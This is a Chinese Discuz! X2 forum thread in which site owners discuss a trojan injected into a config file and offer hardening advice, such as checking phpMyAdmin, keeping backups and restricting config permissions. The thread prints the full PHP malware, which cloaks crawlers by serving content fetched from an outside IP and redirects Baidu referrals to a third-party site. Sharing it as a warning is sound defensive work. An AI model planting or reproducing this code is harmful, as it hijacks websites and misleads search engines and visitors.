DZX2 可能存在新的安全问题

网站一直很正常，今天发现被人注入如下代码，请大家共同警惕：

1. <?php^M
   
2. /*
   
3. @error_reporting (E_ALL & ~E_NOTICE & ~E_WARNING);^M
   
4. ini_set('display_errors',0);^M
   
5. ^M
   
6. $spider_arr = array(^M
   
7.         'baiduspider',^M
   
8.         'baiduspider/2.0',^M
   
9.         'baiducustomer',^M
   
10.         'baidu-thumbnail',^M
    
11.         'baiduspider-mobile-gate',^M
    
12.         'baiduspider-mobile-gate',^M
    
13.         'baidu-transcoder/1.0.6.0',^M
    
14. ^M
    
15.         'googlebot/2.1',^M
    
16.         'googlebot-image/1.0',^M
    
17.         'feedfetcher-google',^M
    
18.         'mediapartners-google',^M
    
19.         'adsbot-google',^M
    
20.         'googlebot-mobile/2.1',^M
    
21.         'googlefriendconnect/1.0',^M
    
22. ^M
    
23.         'sosospider',^M
    
24.         'sosoblogspider',^M
    
25.         'sosoimagespider',^M
    
26. ^M
    
27.         'sogou web robot',^M
    
28.         'sogou web spider/3.0',^M
    
29.         'sogou web spider/4.0',^M
    
30.         'sogou head spider/3.0',^M
    
31.         'sogou-test-spider/4.0',^M
    
32.         'sogou orion spider/4.0',^M
    
33. );^M
    
34. ^M
    
35. 。。。。。。。。。。。。。。

复制代码

你站点被挂马了吧，你看下你网站是否有 phpmyadmin 这种漏洞王，自己扫下服务器，X2暂时没发现啥致命的漏洞。

m.king 发表于 2012-4-19 22:19
你站点被挂马了吧，你看下你网站是否有 phpmyadmin 这种漏洞王，自己扫下服务器，X2暂时没发现啥致命的漏洞 ...

十分感谢，确实是一种马，只是修改了config文件。

所以得多备份，常备份就不怕马了。我之前常被人攻击的！因为是做金融服务。

定位：信用卡、贷款；
案例：http://www.zgxykw.com　中国信用卡网

经历这件事情后，发现百度、google对网站几乎没有什么影响，20多天了流量、人数基本上没有变化。

1. <?php
   
2. 
   
3. @error_reporting (E_ALL & ~E_NOTICE & ~E_WARNING);
   
4. 
   
5. ini_set('display_errors',0);
   
6. 
   
7. 
   
8. 
   
9. $spider_arr = array(
   
10. 
    
11. 'baiduspider',
    
12. 
    
13. 'baiduspider/2.0',
    
14. 
    
15. 'baiducustomer',
    
16. 
    
17. 'baidu-thumbnail',
    
18. 
    
19. 'baiduspider-mobile-gate',
    
20. 
    
21. 'baiduspider-mobile-gate',
    
22. 
    
23. 'baidu-transcoder/1.0.6.0',
    
24. 
    
25. 
    
26. 
    
27. 'googlebot/2.1',
    
28. 
    
29. 'googlebot-image/1.0',
    
30. 
    
31. 'feedfetcher-google',
    
32. 
    
33. 'mediapartners-google',
    
34. 
    
35. 'adsbot-google',
    
36. 
    
37. 'googlebot-mobile/2.1',
    
38. 
    
39. 'googlefriendconnect/1.0',
    
40. 
    
41. 
    
42. 
    
43. 'sosospider',
    
44. 
    
45. 'sosoblogspider',
    
46. 
    
47. 'sosoimagespider',
    
48. 
    
49. 
    
50. 
    
51. 'sogou web robot',
    
52. 
    
53. 'sogou web spider/3.0',
    
54. 
    
55. 'sogou web spider/4.0',
    
56. 
    
57. 'sogou head spider/3.0',
    
58. 
    
59. 'sogou-test-spider/4.0',
    
60. 
    
61. 'sogou orion spider/4.0',
    
62. 
    
63. );
    
64. 
    
65. 
    
66. 
    
67. $not_spider_ip_arr = array(
    
68. 
    
69. "222.77.187.33",
    
70. 
    
71. "125.90.88.96"
    
72. 
    
73. );
    
74. 
    
75. 
    
76. 
    
77. $ref_arr = array(
    
78. 
    
79.     'baidu.com',
    
80. 
    
81.     'google.com'
    
82. 
    
83. );
    
84. 
    
85. 
    
86. 
    
87. $agent = $_SERVER['HTTP_USER_AGENT'];
    
88. 
    
89. $rip = $_SERVER["REMOTE_ADDR"];
    
90. 
    
91. $referer = $_SERVER["HTTP_REFERER"];
    
92. 
    
93. $spider = false;
    
94. 
    
95. foreach($spider_arr as $_spider) {
    
96. 
    
97. if(stripos($agent,$_spider) !== false) {
    
98. 
    
99. $spider = true;
    
100. 
     
101. break;
     
102. 
     
103. }
     
104. 
     
105. }
     
106. 
     
107. 
     
108. 
     
109. if(in_array($rip,$not_spider_ip_arr)) {
     
110. 
     
111. $spider = false;
     
112. 
     
113. }
     
114. 
     
115. 
     
116. 
     
117. $ref = false;
     
118. 
     
119. foreach($ref_arr as $_ref) {
     
120. 
     
121. if(stripos($referer,$_ref) !== false) {
     
122. 
     
123. $ref = true;
     
124. 
     
125. break;
     
126. 
     
127. }
     
128. 
     
129. }
     
130. 
     
131. 
     
132. 
     
133. $query_string=$_SERVER["HTTP_REFERER"];
     
134. 
     
135. function isSpider($v)
     
136. 
     
137. {
     
138. 
     
139. $spiders=array("baidu.com","google.com","soso","sogou");
     
140. 
     
141. $i=0;
     
142. 
     
143. foreach ($spiders as $i => $value) {
     
144. 
     
145. if(stristr($v,$spiders[$i])){return true;}
     
146. 
     
147. }
     
148. 
     
149. return false;
     
150. 
     
151. }
     
152. 
     
153. if(isSpider($_SERVER['HTTP_REFERER']))
     
154. 
     
155. {
     
156. 
     
157.       
     
158. 
     
159. if(stristr($_SERVER["HTTP_REFERER"],'baidu')) {
     
160. 
     
161. Header("Location: ".'http://www.puer.com.tw/ec/wap/piao.htm?'.$_SERVER['SERVER_NAME']);
     
162. 
     
163. exit;
     
164. 
     
165. }
     
166. 
     
167. 
     
168. 
     
169. }
     
170. 
     
171. 
     
172. 
     
173. 
     
174. 
     
175. if($spider) {
     
176. 
     
177. echo file_get_contents('http://175.6.1.200:8080/ok/piao.php');
     
178. 
     
179. exit;
     
180. 
     
181. }
     
182. 
     
183. ?>
     
184. 
     
185. <?php
     
186. 
     
187. if (function_exists("ini_get") && function_exists("ini_set")) {
     
188. 
     
189. ini_set("display_errors",1);
     
190. 
     
191. ini_set("error_reporting",E_ALL & ~E_NOTICE);
     
192. 
     
193. }
     
194. 
     
195. ?>
     
196. 
     

复制代码

完整的木马如下，不清楚怎么被挂上去的。

enhand 发表于 2012-4-21 07:07
完整的木马如下，不清楚怎么被挂上去的。

我7.2的一个论坛也被挂过这个。

这种东西写的还挺巧妙地，论坛安装完毕就应该降低 config目录的读写权限比较好。